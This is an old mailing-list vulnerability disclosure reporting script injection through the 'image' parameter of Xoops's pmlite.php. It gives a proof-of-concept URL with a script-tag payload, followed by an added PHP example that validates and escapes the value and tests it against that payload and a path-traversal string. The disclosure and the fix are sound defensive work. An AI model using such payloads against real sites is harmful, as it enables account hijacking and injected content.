From: Cabezon Aurélien (aurelien.cabezon isecurelabs.com)
Date: Tue Jan 29 2002 - 11:09:01 CST
Hi again,
I just found another Script injection issue in Xoops Private Message Box.
http://xooped-site/pmlite.php?to_userid=[USER_ID_OF_TARGET]&msg_id=&image=foo.gif'><script>alert("test");</script><img%20src='http://www.isecurelabs.com/images/barre.jpg&op=submit&theme=snow&subject=Are you sure ?&message=really?&submit=Submit
Again a lack of checks on user input on the *image* variable.
To be continued...
---
Cabezon Aurélien | aurelien.cabezon isecurelabs.com
http://www.iSecureLabs.com | French Security Portal
____________________________________________
" Know that today is the most beautiful day of your life, for it is the first of those you have left to live "
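
The missing check on the *image* variable described in the message above, as an added example that is not part of the original post and is not Xoops code: the request value is allowlisted as a bare image file name and escaped when written into the single-quoted src attribute. The function names, the images/subject/ directory and the fallback icon name are assumptions made for illustration.

```php
<?php
// Added example, not Xoops code. Function names, the "images/subject/"
// directory and the fallback icon are assumptions for illustration.

// Before: the request value is concatenated into a single-quoted src
// attribute with no checks, so a quote in the value ends the attribute.
function render_icon_unsafe(string $image): string
{
    return "<img src='images/subject/" . $image . "' alt='' />";
}

// After, step 1: accept only a bare file name with a known image
// extension. No quotes, angle brackets, slashes, dots in the base name
// or trailing newline can pass (\A and \z anchor the whole string).
function validate_icon_name(string $image): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.(?:gif|png|jpe?g)\z/', $image) !== 1) {
        return null;
    }
    return $image;
}

// After, step 2: escape on output even though the value was validated.
// ENT_QUOTES matters here because the attribute is single-quoted and
// PHP versions before 8.1 leave ' unescaped by default.
function render_icon_safe(string $image, string $fallback = 'icon1.gif'): string
{
    $name = validate_icon_name($image) ?? $fallback;
    return "<img src='images/subject/"
        . htmlspecialchars($name, ENT_QUOTES, 'UTF-8')
        . "' alt='' />";
}

// Constructed sample inputs: one normal value, the value from the report,
// a path traversal attempt and a trailing-newline variant.
$samples = [
    'foo.gif',
    "foo.gif'><script>alert(\"test\");</script><img src='x.jpg",
    '../../uploads/a.gif',
    "foo.gif\n",
];

foreach ($samples as $s) {
    $verdict = validate_icon_name($s) === null ? 'rejected' : 'accepted';
    printf("%-9s %s\n", $verdict, json_encode($s));
    echo '  unsafe: ', render_icon_unsafe($s), "\n";
    echo '  safe:   ', render_icon_safe($s), "\n";
}
```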